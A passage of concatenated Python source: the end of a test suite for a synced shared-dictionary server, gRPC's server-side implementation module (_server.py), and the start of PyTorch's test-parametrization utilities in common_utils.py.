a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
del a['foo']
a.sync()
with self.assertRaises(KeyError):
b['foo']
def test_setdefault(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
self.assertEqual(a.setdefault('foo', 'bar'), 'bar')
a.sync()
self.assertEqual(b['foo'], 'bar')
def test_server_suspend(self):
a = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
with self.server.suspended():
a['foo'] = 'test'
a.sync()
self.assertEqual(a['foo'], 'test')
def test_contains(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertTrue('foo' in b)
self.assertFalse('bar' in b)
def test_cache_grow(self):
import mmap
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
count = mmap.PAGESIZE * 2
for i in range(count):
key = 'foo%d' % i
val = 'bar%d' % i
a[key] = val
self.assertEqual(a[key], val)
a.sync()
for i in range(count):
key = 'foo%d' % i
val = 'bar%d' % i
self.assertEqual(a[key], val)
self.assertEqual(b[key], val)
def test_missing_var(self):
a = self.get_dict('var')
with self.assertRaises(NameError):
b = self.get_dict('does-not-exist', share_connection=False)
with self.assertRaises(NameError):
b = self.get_dict('does-not-exist')
def test_var_factory(self):
def factory(name):
return Sqlite3DB(':memory:')
a = self.get_dict('var')
self.server.db.set_db_factory(factory)
b = self.get_dict('test1', share_connection=False)
c = self.get_dict('test2')
def test_cross_var(self):
def factory(name):
return Sqlite3DB(':memory:')
self.server.db.set_db_factory(factory)
a = self.get_dict('var', share_connection=False)
b = self.get_dict('test', share_connection=False)
a['foo'] = 'bar'
a.sync()
with self.assertRaises(KeyError):
b['foo']
b['foo'] = 'baz'
b.sync()
self.assertEqual(a['foo'], 'bar')
self.assertEqual(b['foo'], 'baz')
class NoCacheTests(CommonTests, unittest.TestCase):
use_cache = False
def test_cached(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertFalse(b.is_cached('foo'))
self.assertFalse(b.is_cached('not-present'))
a['foo'] = 'test'
b.invalidate('foo')
self.assertFalse(b.is_cached('foo'))
a.sync()
self.assertEqual(b['foo'], 'test')
def test_invalidate_all(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertFalse(b.is_cached('foo'))
with self.server.suspended():
a['foo'] = 'test'
b.invalidate_all()
self.assertFalse(b.is_cached('foo'))
a.sync()
self.assertEqual(b['foo'], 'test')
class CacheTests(CommonTests, unittest.TestCase):
def test_cached(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertTrue(b.is_cached('foo'))
self.assertFalse(b.is_cached('not-present'))
with self.server.suspended():
a['foo'] = 'test'
self.assertEqual(b['foo'], 'bar')
b.invalidate('foo')
self.assertFalse(b.is_cached('foo'))
a.sync()
self.assertEqual(b['foo'], 'test')
def test_invalidate_all(self):
a = self.get_dict('var', share_connection=False)
b = self.get_dict('var', share_connection=False)
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertTrue(b.is_cached('foo'))
with self.server.suspended():
a['foo'] = 'test'
self.assertEqual(b['foo'], 'bar')
b.invalidate_all()
self.assertFalse(b.is_cached('foo'))
a.sync()
self.assertEqual(b['foo'], 'test')
class ImplicitCloseTests(CacheTests):
close_on_cleanup = False
def test_close(self):
a = self.get_dict('var')
b = self.get_dict('var', share_connection=False)
c = self.get_dict('var')
a['foo'] = 'bar'
a.sync()
self.assertEqual(b['foo'], 'bar')
self.assertEqual(c['foo'], 'bar')
a.close()
c['baz'] = 'bat'
c.sync()
self.assertEqual(b['baz'], 'bat')
del c
del a
b['test'] = 'blah'
|
_server.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Service-side implementation of gRPC Python."""
import collections
import enum
import logging
import threading
import time
import six
import grpc
from grpc import _common
from grpc import _interceptor
from grpc._cython import cygrpc
from grpc.framework.foundation import callable_util
_SHUTDOWN_TAG = 'shutdown'
_REQUEST_CALL_TAG = 'request_call'
_RECEIVE_CLOSE_ON_SERVER_TOKEN = 'receive_close_on_server'
_SEND_INITIAL_METADATA_TOKEN = 'send_initial_metadata'
_RECEIVE_MESSAGE_TOKEN = 'receive_message'
_SEND_MESSAGE_TOKEN = 'send_message'
_SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN = (
'send_initial_metadata * send_message')
_SEND_STATUS_FROM_SERVER_TOKEN = 'send_status_from_server'
_SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN = (
'send_initial_metadata * send_status_from_server')
_OPEN = 'open'
_CLOSED = 'closed'
_CANCELLED = 'cancelled'
_EMPTY_FLAGS = 0
_UNEXPECTED_EXIT_SERVER_GRACE = 1.0
def _serialized_request(request_event):
return request_event.batch_operations[0].message()
def _application_code(code):
cygrpc_code = _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE.get(code)
return cygrpc.StatusCode.unknown if cygrpc_code is None else cygrpc_code
def _completion_code(state):
if state.code is None:
return cygrpc.StatusCode.ok
else:
return _application_code(state.code)
def _abortion_code(state, code):
if state.code is None:
return code
else:
return _application_code(state.code)
def _details(state):
return b'' if state.details is None else state.details
class _HandlerCallDetails(
collections.namedtuple('_HandlerCallDetails', (
'method',
'invocation_metadata',
)), grpc.HandlerCallDetails):
pass
class _RPCState(object):
def __init__(self):
self.condition = threading.Condition()
self.due = set()
self.request = None
self.client = _OPEN
self.initial_metadata_allowed = True
self.disable_next_compression = False
self.trailing_metadata = None
self.code = None
self.details = None
self.statused = False
self.rpc_errors = []
self.callbacks = []
self.abortion = None
def _raise_rpc_error(state):
rpc_error = grpc.RpcError()
state.rpc_errors.append(rpc_error)
raise rpc_error
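# Each in-flight batch operation is tracked by a token in state.due; once the last due
# token is removed and the RPC has been cancelled or statused, the pending callbacks are
# handed back (and cleared) so the serving loop runs them exactly once.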
def _possibly_finish_call(state, token):
state.due.remove(token)
if (state.client is _CANCELLED or state.statused) and not state.due:
callbacks = state.callbacks
state.callbacks = None
return state, callbacks
else:
return None, ()
def _send_status_from_server(state, token):
def send_status_from_server(unused_send_status_from_server_event):
with state.condition:
return _possibly_finish_call(state, token)
return send_status_from_server
def _abort(state, call, code, details):
if state.client is not _CANCELLED:
effective_code = _abortion_code(state, code)
effective_details = details if state.details is None else state.details
if state.initial_metadata_allowed:
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, effective_code, effective_details,
_EMPTY_FLAGS),
)
token = _SEND_INITIAL_METADATA_AND_SEND_STATUS_FROM_SERVER_TOKEN
else:
operations = (cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, effective_code, effective_details,
_EMPTY_FLAGS),)
token = _SEND_STATUS_FROM_SERVER_TOKEN
call.start_server_batch(operations,
_send_status_from_server(state, token))
state.statused = True
state.due.add(token)
def _receive_close_on_server(state):
def receive_close_on_server(receive_close_on_server_event):
with state.condition:
if receive_close_on_server_event.batch_operations[0].cancelled():
state.client = _CANCELLED
elif state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_CLOSE_ON_SERVER_TOKEN)
return receive_close_on_server
def _receive_message(state, call, request_deserializer):
def receive_message(receive_message_event):
serialized_request = _serialized_request(receive_message_event)
if serialized_request is None:
with state.condition:
if state.client is _OPEN:
state.client = _CLOSED
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
else:
request = _common.deserialize(serialized_request,
request_deserializer)
with state.condition:
if request is None:
_abort(state, call, cygrpc.StatusCode.internal,
b'Exception deserializing request!')
else:
state.request = request
state.condition.notify_all()
return _possibly_finish_call(state, _RECEIVE_MESSAGE_TOKEN)
return receive_message
def _send_initial_metadata(state):
def send_initial_metadata(unused_send_initial_metadata_event):
with state.condition:
return _possibly_finish_call(state, _SEND_INITIAL_METADATA_TOKEN)
return send_initial_metadata
def _send_message(state, token):
def send_message(unused_send_message_event):
with state.condition:
state.condition.notify_all()
return _possibly_finish_call(state, token)
return send_message
class _Context(grpc.ServicerContext):
def __init__(self, rpc_event, state, request_deserializer):
self._rpc_event = rpc_event
self._state = state
self._request_deserializer = request_deserializer
def is_active(self):
with self._state.condition:
return self._state.client is not _CANCELLED and not self._state.statused
def time_remaining(self):
return max(
float(self._rpc_event.call_details.deadline) - time.time(), 0)
def cancel(self):
self._rpc_event.call.cancel()
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def disable_next_message_compression(self):
with self._state.condition:
self._state.disable_next_compression = True
def invocation_metadata(self):
return self._rpc_event.invocation_metadata
def peer(self):
return _common.decode(self._rpc_event.call.peer())
def peer_identities(self):
return cygrpc.peer_identities(self._rpc_event.call)
def peer_identity_key(self):
id_key = cygrpc.peer_identity_key(self._rpc_event.call)
return id_key if id_key is None else _common.decode(id_key)
def auth_context(self):
return {
_common.decode(key): value
for key, value in six.iteritems(
cygrpc.auth_context(self._rpc_event.call))
}
def send_initial_metadata(self, initial_metadata):
with self._state.condition:
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
else:
if self._state.initial_metadata_allowed:
operation = cygrpc.SendInitialMetadataOperation(
initial_metadata, _EMPTY_FLAGS)
self._rpc_event.call.start_server_batch(
(operation,), _send_initial_metadata(self._state))
self._state.initial_metadata_allowed = False
self._state.due.add(_SEND_INITIAL_METADATA_TOKEN)
else:
raise ValueError('Initial metadata no longer allowed!')
def set_trailing_metadata(self, trailing_metadata):
with self._state.condition:
self._state.trailing_metadata = trailing_metadata
def abort(self, code, details):
with self._state.condition:
self._state.code = code
self._state.details = _common.encode(details)
self._state.abortion = Exception()
raise self._state.abortion
def set_code(self, code):
with self._state.condition:
self._state.code = code
def set_details(self, details):
with self._state.condition:
self._state.details = _common.encode(details)
class _RequestIterator(object):
def __init__(self, state, call, request_deserializer):
self._state = state
self._call = call
self._request_deserializer = request_deserializer
def _raise_or_start_receive_message(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif self._state.client is _CLOSED or self._state.statused:
raise StopIteration()
else:
self._call.start_server_batch(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
_receive_message(self._state, self._call,
self._request_deserializer))
self._state.due.add(_RECEIVE_MESSAGE_TOKEN)
def _look_for_request(self):
if self._state.client is _CANCELLED:
_raise_rpc_error(self._state)
elif (self._state.request is None and
_RECEIVE_MESSAGE_TOKEN not in self._state.due):
raise StopIteration()
else:
request = self._state.request
self._state.request = None
return request
def _next(self):
with self._state.condition:
self._raise_or_start_receive_message()
while True:
self._state.condition.wait()
request = self._look_for_request()
if request is not None:
return request
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def _unary_request(rpc_event, state, request_deserializer):
def unary_request():
with state.condition:
if state.client is _CANCELLED or state.statused:
return None
else:
rpc_event.call.start_server_batch(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
_receive_message(state, rpc_event.call,
request_deserializer))
state.due.add(_RECEIVE_MESSAGE_TOKEN)
while True:
state.condition.wait()
if state.request is None:
if state.client is _CLOSED:
details = '"{}" requires exactly one request message.'.format(
rpc_event.call_details.method)
_abort(state, rpc_event.call,
cygrpc.StatusCode.unimplemented,
_common.encode(details))
return None
elif state.client is _CANCELLED:
return None
else:
request = state.request
state.request = None
return request
return unary_request
def _call_behavior(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return behavior(argument, context), True
except Exception as exception: # pylint: disable=broad-except
with state.condition:
if exception is state.abortion:
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
b'RPC Aborted')
elif exception not in state.rpc_errors:
details = 'Exception calling application: {}'.format(exception)
logging.exception(details)
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
_common.encode(details))
return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
try:
return next(response_iterator), True
except StopIteration:
return None, True
except Exception as exception: # pylint: disable=broad-except
with state.condition:
if exception is state.abortion:
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
b'RPC Aborted')
elif exception not in state.rpc_errors:
details = 'Exception iterating responses: {}'.format(exception)
logging.exception(details)
_abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
_common.encode(details))
return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
serialized_response = _common.serialize(response, response_serializer)
if serialized_response is None:
with state.condition:
_abort(state, rpc_event.call, cygrpc.StatusCode.internal,
b'Failed to serialize response!')
return None
else:
return serialized_response
def _send_response(rpc_event, state, serialized_response):
with state.condition:
if state.client is _CANCELLED or state.statused:
return False
else:
if state.initial_metadata_allowed:
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.SendMessageOperation(serialized_response,
_EMPTY_FLAGS),
)
state.initial_metadata_allowed = False
token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
else:
operations = (cygrpc.SendMessageOperation(
serialized_response, _EMPTY_FLAGS),)
token = _SEND_MESSAGE_TOKEN
rpc_event.call.start_server_batch(operations,
_send_message(state, token))
state.due.add(token)
while True:
state.condition.wait()
if token not in state.due:
return state.client is not _CANCELLED and not state.statused
def _status(rpc_event, state, serialized_response):
with state.condition:
if state.client is not _CANCELLED:
code = _completion_code(state)
details = _details(state)
operations = [
cygrpc.SendStatusFromServerOperation(
state.trailing_metadata, code, details, _EMPTY_FLAGS),
]
if state.initial_metadata_allowed:
operations.append(
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS))
if serialized_response is not None:
operations.append(
cygrpc.SendMessageOperation(serialized_response,
_EMPTY_FLAGS))
rpc_event.call.start_server_batch(
operations,
_send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
state.statused = True
state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = _call_behavior(rpc_event, state, behavior, argument,
request_deserializer)
if proceed:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
request_deserializer, response_serializer):
argument = argument_thunk()
if argument is not None:
response_iterator, proceed = _call_behavior(
rpc_event, state, behavior, argument, request_deserializer)
if proceed:
while True:
response, proceed = _take_response_from_response_iterator(
rpc_event, state, response_iterator)
if proceed:
if response is None:
_status(rpc_event, state, None)
break
else:
serialized_response = _serialize_response(
rpc_event, state, response, response_serializer)
if serialized_response is not None:
proceed = _send_response(rpc_event, state,
serialized_response)
if not proceed:
break
else:
break
else:
break
def _handle_unary_unary(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
return thread_pool.submit(_unary_response_in_pool, rpc_event, state,
method_handler.unary_unary, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, thread_pool):
unary_request = _unary_request(rpc_event, state,
method_handler.request_deserializer)
return thread_pool.submit(_stream_response_in_pool, rpc_event, state,
method_handler.unary_stream, unary_request,
method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.call,
method_handler.request_deserializer)
return thread_pool.submit(
_unary_response_in_pool, rpc_event, state, method_handler.stream_unary,
lambda: request_iterator, method_handler.request_deserializer,
method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler, thread_pool):
request_iterator = _RequestIterator(state, rpc_event.call,
method_handler.request_deserializer)
return thread_pool.submit(
_stream_response_in_pool, rpc_event, state,
method_handler.stream_stream, lambda: request_iterator,
method_handler.request_deserializer, method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers, interceptor_pipeline):
def query_handlers(handler_call_details):
for generic_handler in generic_handlers:
method_handler = generic_handler.service(handler_call_details)
if method_handler is not None:
return method_handler
return None
handler_call_details = _HandlerCallDetails(
_common.decode(rpc_event.call_details.method),
rpc_event.invocation_metadata)
if interceptor_pipeline is not None:
return interceptor_pipeline.execute(query_handlers,
handler_call_details)
else:
return query_handlers(handler_call_details)
def _reject_rpc(rpc_event, status, details):
operations = (
cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),
cygrpc.SendStatusFromServerOperation(None, status, details,
_EMPTY_FLAGS),
)
rpc_state = _RPCState()
rpc_event.call.start_server_batch(operations,
lambda ignored_event: (rpc_state, (),))
return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
state = _RPCState()
with state.condition:
rpc_event.call.start_server_batch(
(cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),),
_receive_close_on_server(state))
state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
if method_handler.request_streaming:
if method_handler.response_streaming:
return state, _handle_stream_stream(rpc_event, state,
method_handler, thread_pool)
else:
return state, _handle_stream_unary(rpc_event, state,
method_handler, thread_pool)
else:
if method_handler.response_streaming:
return state, _handle_unary_stream(rpc_event, state,
method_handler, thread_pool)
else:
return state, _handle_unary_unary(rpc_event, state,
method_handler, thread_pool)
def _handle_call(rpc_event, generic_handlers, interceptor_pipeline, thread_pool,
concurrency_exceeded):
if not rpc_event.success:
return None, None
if rpc_event.call_details.method is not None:
try:
method_handler = _find_method_handler(rpc_event, generic_handlers,
interceptor_pipeline)
except Exception as exception: # pylint: disable=broad-except
details = 'Exception servicing handler: {}'.format(exception)
logging.exception(details)
return _reject_rpc(rpc_event, cygrpc.StatusCode.unknown,
b'Error in service handler!'), None
if method_handler is None:
return _reject_rpc(rpc_event, cygrpc.StatusCode.unimplemented,
b'Method not found!'), None
elif concurrency_exceeded:
return _reject_rpc(rpc_event, cygrpc.StatusCode.resource_exhausted,
b'Concurrent RPC limit exceeded!'), None
else:
return _handle_with_method_handler(rpc_event, method_handler,
thread_pool)
else:
return None, None
@enum.unique
class _ServerStage(enum.Enum):
STOPPED = 'stopped'
STARTED = 'started'
GRACE = 'grace'
class _ServerState(object):
# pylint: disable=too-many-arguments
def __init__(self, completion_queue, server, generic_handlers,
interceptor_pipeline, thread_pool, maximum_concurrent_rpcs):
self.lock = threading.RLock()
self.completion_queue = completion_queue
self.server = server
self.generic_handlers = list(generic_handlers)
self.interceptor_pipeline = interceptor_pipeline
self.thread_pool = thread_pool
self.stage = _ServerStage.STOPPED
self.shutdown_events = None
self.maximum_concurrent_rpcs = maximum_concurrent_rpcs
self.active_rpc_count = 0
# TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
self.rpc_states = set()
self.due = set()
def _add_generic_handlers(state, generic_handlers):
with state.lock:
state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
with state.lock:
return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
with state.lock:
return state.server.add_http2_port(address,
server_credentials._credentials)
def _request_call(state):
state.server.request_call(state.completion_queue, state.completion_queue,
_REQUEST_CALL_TAG)
state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
if not state.rpc_states and not state.due:
for shutdown_event in state.shutdown_events:
shutdown_event.set()
state.stage = _ServerStage.STOPPED
return True
else:
return False
def _on_call_completed(state):
with state.lock:
state.active_rpc_count -= 1
def _serve(state):
while True:
event = state.completion_queue.poll()
if event.tag is _SHUTDOWN_TAG:
with state.lock:
state.due.remove(_SHUTDOWN_TAG)
if _stop_serving(state):
return
elif event.tag is _REQUEST_CALL_TAG:
with state.lock:
state.due.remove(_REQUEST_CALL_TAG)
concurrency_exceeded = (
state.maximum_concurrent_rpcs is not None and
state.active_rpc_count >= state.maximum_concurrent_rpcs)
rpc_state, rpc_future = _handle_call(
event, state.generic_handlers, state.interceptor_pipeline,
state.thread_pool, concurrency_exceeded)
if rpc_state is not None:
state.rpc_states.add(rpc_state)
if rpc_future is not None:
state.active_rpc_count += 1
rpc_future.add_done_callback(
lambda unused_future: _on_call_completed(state))
if state.stage is _ServerStage.STARTED:
_request_call(state)
elif _stop_serving(state):
return
else:
rpc_state, callbacks = event.tag(event)
for callback in callbacks:
callable_util.call_logging_exceptions(
callback, 'Exception calling callback!')
if rpc_state is not None:
with state.lock:
state.rpc_states.remove(rpc_state)
if _stop_serving(state):
return
# We want to force the deletion of the previous event
# ~before~ we poll again; if the event has a reference
# to a shutdown Call object, this can induce spinlock.
event = None
def _stop(state, grace):
with state.lock:
if state.stage is _ServerStage.STOPPED:
shutdown_event = threading.Event()
shutdown_event.set()
return shutdown_event
else:
if state.stage is _ServerStage.STARTED:
state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
state.stage = _ServerStage.GRACE
state.shutdown_events = []
state.due.add(_SHUTDOWN_TAG)
shutdown_event = threading.Event()
state.shutdown_events.append(shutdown_event)
if grace is None:
state.server.cancel_all_calls()
else:
def cancel_all_calls_after_grace():
shutdown_event.wait(timeout=grace)
with state.lock:
state.server.cancel_all_calls()
thread = threading.Thread(target=cancel_all_calls_after_grace)
thread.start()
return shutdown_event
shutdown_event.wait()
return shutdown_event
def _start(state):
with state.lock:
if state.stage is not _ServerStage.STOPPED:
raise ValueError('Cannot start already-started server!')
state.server.start()
state.stage = _ServerStage.STARTED
_request_call(state)
def cleanup_server(timeout):
if timeout is None:
_stop(state, _UNEXPECTED_EXIT_SERVER_GRACE).wait()
else:
_stop(state, timeout).wait()
thread = _common.CleanupThread(
cleanup_server, target=_serve, args=(state,))
thread.start()
class Server(grpc.Server):
# pylint: disable=too-many-arguments
def __init__(self, thread_pool, generic_handlers, interceptors, options,
maximum_concurrent_rpcs):
completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server(_common.channel_args(options))
server.register_completion_queue(completion_queue)
self._state = _ServerState(completion_queue, server, generic_handlers,
_interceptor.service_pipeline(interceptors),
thread_pool, maximum_concurrent_rpcs)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
_add_generic_handlers(self._state, generic_rpc_handlers)
def add_insecure_port(self, address):
return _add_insecure_port(self._state, _common.encode(address))
def add_secure_port(self, address, server_credentials):
return _add_secure_port(self._state, _common.encode(address),
server_credentials)
def start(self):
_start(self._state)
def stop(self, grace):
return _stop(self._state, grace)
def __del__(self):
_stop(self._state, None)
|
common_utils.py
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
import __main__ # type: ignore[import]
import errno
import ctypes
from typing import cast, Any, Dict, Iterable, Iterator, Optional, Union, List, TypeVar
from unittest.mock import MagicMock
import numpy as np
import expecttest
from .._core import \
(_compare_tensors_internal, _compare_scalars_internal, _compare_return_type)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from statistics import mean
import functools
from .composite_compliance import no_dispatch
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
RETRY_TEST_CASES = os.getenv('PYTORCH_RETRY_TEST_CASES') == '1'
OVERRIDE_FLAKY_SIGNAL = os.getenv('PYTORCH_OVERRIDE_FLAKY_SIGNAL') == '1'
MAX_NUM_RETRIES = 3
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
NATIVE_DEVICES = ('cpu', 'cuda', 'meta')
class _TestParametrizer(object):
"""
Decorator class for parametrizing a test function, yielding a set of new tests spawned
from the original generic test, each specialized for a specific set of test inputs. For
example, parametrizing a test across the set of ops will result in a test function per op.
The decision of how to parametrize / what to parametrize over is intended to be implemented
by each derived class.
In detail, the decorator adds a 'parametrize_fn' property to the test function that is called
during device-specific test instantiation performed in instantiate_device_type_tests(). Because of this,
there is no need to parametrize over device type, as that is already handled separately.
If the decorator is applied to a test function that already has a 'parametrize_fn' property, a new
composite 'parametrize_fn' will be created that generates tests with the product of the parameters
generated by the old and new parametrize_fns. This allows for convenient composability of decorators.
"""
def _parametrize_test(self, test, generic_cls, device_cls):
"""
Parametrizes the given test function across whatever dimension is specified by the derived class.
Tests can be parametrized over any arbitrary dimension or combination of dimensions, such as all
ops, all modules, or all ops + their associated dtypes.
Args:
test (fn): Test function to parametrize over
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
device_cls (class): Device-specialized test class object (e.g. TestFooCPU); set to None
if the tests are not part of a device-specific set
Returns:
Generator object returning 3-tuples of:
test (fn): Parametrized test function; must support a device arg and args for any params
test_name (str): Parametrized suffix for the test (e.g. opname_int64); will be appended to
the base name of the test
param_kwargs (dict): Param kwargs to pass to the test (e.g. {'op': 'add', 'dtype': torch.int64})
"""
raise NotImplementedError
def __call__(self, fn):
if hasattr(fn, 'parametrize_fn'):
# Do composition with the product of args.
old_parametrize_fn = fn.parametrize_fn
new_parametrize_fn = self._parametrize_test
fn.parametrize_fn = compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn)
else:
fn.parametrize_fn = self._parametrize_test
return fn
def compose_parametrize_fns(old_parametrize_fn, new_parametrize_fn):
"""
Returns a parametrize_fn that parametrizes over the product of the parameters handled
by the given parametrize_fns. Each given parametrize_fn should have the signature
f(test, generic_cls, device_cls).
The test names will be a combination of the names produced by the parametrize_fns in
"<new_name>_<old_name>" order. This order is done to match intuition for constructed names
when composing multiple decorators; the names will be built in top to bottom order when stacking
parametrization decorators.
Args:
old_parametrize_fn (callable) - First parametrize_fn to compose.
new_parametrize_fn (callable) - Second parametrize_fn to compose.
"""
def composite_fn(test, generic_cls, device_cls,
old_parametrize_fn=old_parametrize_fn,
new_parametrize_fn=new_parametrize_fn):
old_tests = [(test, test_name, param_kwargs) for (test, test_name, param_kwargs) in
old_parametrize_fn(test, generic_cls, device_cls)]
for (old_test, old_test_name, old_param_kwargs) in old_tests:
for (new_test, new_test_name, new_param_kwargs) in \
new_parametrize_fn(old_test, generic_cls, device_cls):
redundant_params = set(old_param_kwargs.keys()).intersection(new_param_kwargs.keys())
if redundant_params:
raise RuntimeError('Parametrization over the same parameter by multiple parametrization '
'decorators is not supported. For test "{}", the following parameters '
'are handled multiple times: {}'.format(
test.__name__, redundant_params))
full_param_kwargs = {**old_param_kwargs, **new_param_kwargs}
merged_test_name = '{}{}{}'.format(new_test_name,
'_' if old_test_name != '' and new_test_name != '' else '',
old_test_name)
yield (new_test, merged_test_name, full_param_kwargs)
return composite_fn
def instantiate_parametrized_tests(generic_cls):
"""
Instantiates tests that have been decorated with a parametrize_fn. This is generally performed by a
decorator subclass of _TestParametrizer. The generic test will be replaced on the test class by
parametrized tests with specialized names.
Args:
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
"""
for attr_name in tuple(dir(generic_cls)):
class_attr = getattr(generic_cls, attr_name)
if not hasattr(class_attr, 'parametrize_fn'):
continue
# Remove the generic test from the test class.
delattr(generic_cls, attr_name)
# Add parametrized tests to the test class.
def instantiate_test_helper(cls, name, test, param_kwargs):
@wraps(test)
def instantiated_test(self, param_kwargs=param_kwargs):
test(self, **param_kwargs)
assert not hasattr(generic_cls, name), "Redefinition of test {0}".format(name)
setattr(generic_cls, name, instantiated_test)
for (test, test_suffix, param_kwargs) in class_attr.parametrize_fn(
class_attr, generic_cls=generic_cls, device_cls=None):
full_name = '{}_{}'.format(test.__name__, test_suffix)
instantiate_test_helper(cls=generic_cls, name=full_name, test=test, param_kwargs=param_kwargs)
class subtest(object):
"""
Explicit subtest case for use with test parametrization.
Allows for explicit naming of individual subtest cases as well as applying
decorators to the parametrized test.
Args:
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name (str): Optional name to use for the test.
decorators (iterable): Iterable of decorators to apply to the generated test.
"""
__slots__ = ['arg_values', 'name', 'decorators']
